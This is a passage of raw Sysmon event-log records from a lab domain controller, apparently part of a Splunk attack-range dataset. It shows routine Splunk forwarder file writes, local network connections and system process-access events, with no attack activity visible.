AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D318D8E2088AFC320149A5093B2C60EE,SHA256=3921611FD427877DA78301D1FE4C34027DD0F5B6723DAFA95ECCD527190576E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:35.173{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF9B5AB8D5E4F12305614EAAE3F021D,SHA256=65BC0BADD18055D6CB41C6AC61277C455BFE0876E412A588CE820BD990DB30FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:36.436{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:36.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC4F18533A9868DEC6EDFA80A2DED67D,SHA256=CC0108CF285279E580068B2B871DD7F624F0CFD455F312263A378B0183DFB2E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:36.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D422CDC26D00BF2DAD2588CD37C2C157,SHA256=4E392CB41C76850D9FC8844059EE31864B6498A8DBC03E463527F4EDDD9611A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:37.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B69F7C2B0722B77F491730CD2D92BD28,SHA256=88D6ADE0AC82613192C28C1D0EE320E1144D92DA3E39813845C4F1E1510589B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:26.270{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60171-false10.0.1.12-8000- 23542300x80000000000000002243618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:37.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5929A81733386F6FE7071AA4778C2A,SHA256=0203F37820C8389D75DA7FADF928394D0AA165FABB8E70B145D3003088BB443A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:27.567{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60172-false10.0.1.12-8089- 23542300x80000000000000002243621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:38.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E50AD28E607AA557678CF34443B830,SHA256=60B63949C5E94B27046C3CE3870441C6E0DDFB95E947F9DA2E95ED98A7EAECD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:39.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=534899965684CDEA058DAC314ECF8798,SHA256=6F0619D03C99982ABE67BABBBF36AA4237500A6CBA4630323A007772DF82C704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:40.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A379B395BC04C8518474AC4D6307AF4,SHA256=53303E9EAE9AAA45C2A8E2D590552D9D9D4B1F974E8780CE774BF6CFFA6E3BCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:41.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0D53B1B8E29C319D44E0B8D1018BE35,SHA256=71E415E6FAE79241AC95D804ED7212A517E923C984DFB4BD9517AA88979E939C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:32.286{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60173-false10.0.1.12-8000- 23542300x80000000000000002243627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:42.358{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0BE65E67E2DF1EBD932D5DFED813EE1,SHA256=BE1EE51102AD4787D517FE0B1AC4327FF2971A90A53DE515A8213A3B89BB3BBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:42.108{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46FCD095141ABF401B22497802ABB94A,SHA256=8282420BE2D93BA8A0CECA3E472A8D69D7F18A57226F0C5DC8D0F583F114E32F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:33.144{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local65411- 23542300x80000000000000002243630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:43.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=575765A71690BA7BBFAE425A12E3612E,SHA256=05A6DFB03833431D74AAAC0EA36EF46670ED9ADC67D94719713E6B1D37767266,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:43.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=071C61833A64F4ABF0F72C89EB42FA95,SHA256=49E470510E170AFBA4473BCB5238900B91FF0D3DD3E4DEAB4D76D2BC4ABF986C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:44.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0306531DD5D37CFFDE9A9808E26E89E,SHA256=5B719C05115E3FFAAE2DCB01144B5D9656A83D047224DE39138FAE821D3AC006,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:34.160{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local65411- 23542300x80000000000000002243634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:45.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3DC23D6F2FEC9F880C45404EC4DDC4,SHA256=6FE4CAB4C3124A5AC4DF07B6C714217DC18077202684FA7D8435EEB9BD0398D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:46.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9971F5573793B4318F991A7F330039AD,SHA256=77D3738C493158C7E283D8A79D2106A5D5543D49B62FBFB5D70247C3B61FC426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:46.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E661094F12C661710E943923260EF8D,SHA256=C669FAA3A49A49C2DE75FBD8FCD19FB747DE9541C9F29577DEEC5297B4105EA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:47.471{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D272B1A29ECAC4F3D9581EF489BC1986,SHA256=3063012A7F1220D41E95B32AC02F04A2AF6BA0DF3E504ADDF2FC0BC15A2F68E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:37.348{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60174-false10.0.1.12-8000- 23542300x80000000000000002243637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:47.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D64BCD30BF13CD843C06408DA41738E2,SHA256=CCD4EE9CA2691C970B3897A826F845472307B293792F8D8716DA33592708668E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:48.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD1C1DF0178396D95011B461AF40061,SHA256=F1A35E46FE4E3F75327FC944184D36CCFF270EDA83718280E2AE3B9863159942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:48.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=87D339820B6D949E8237EF75DB483300,SHA256=F8662DA3B5D2E17856C3453530EEBA83B6447B92D2E9C729900A0D10C7CC7CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:49.529{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D77ADD04DBDC1302CF9729C45045590,SHA256=265105F0D27E806B117E278AE8BBFCAB4D131EE6597799090A753137C9F17D82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:40.973{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60175-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002243645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:40.973{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60175-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002243644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:50.566{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91EFE693F81020EA2F19B24ABD7F9FB5,SHA256=6405E49B98879ED694C90DA2AF5E947CA3B480188F0A6F1AE0A2C5C87F4DC44C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:50.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=445795923F702759795D99940796A082,SHA256=FC5CEEEE6AC6CD57A38C560085CDE67D414D3B9ADEAB42F5BF5B5677B0DBAB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:51.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E281E5261322966F6D51EEF60B449679,SHA256=D865A77C601AE87CD548FBFA09E72D0D569BA9FAC96D704C27E0ACFFDB24D4BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:52.733{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:52.733{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:52.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D8345D80FB815AC77D13AB6F040EED,SHA256=88076A3444748D25F794D144EC998C9B81E30CD05BB086C615471B75E213C573,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:42.410{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60176-false10.0.1.12-8000- 23542300x80000000000000002243648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:52.271{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FA7C74003E00D78E261198FB0E0DA7C,SHA256=ABCEB43CF03FA49F7B4FC69832F471C8EA6DBBB89D6E2036A50DB50A9A120361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:53.675{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26330A5011B4A6C4BCCA1AB2087A25CE,SHA256=3231685CE7010F4CA32CE72415D18C8D79DD0E2DEED57E0C16DBCA1A537B3315,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E1A-603E-ECAA-00000000AD01}13008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E1A-603E-ECAA-00000000AD01}13008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.920{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E1A-603E-ECAA-00000000AD01}13008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 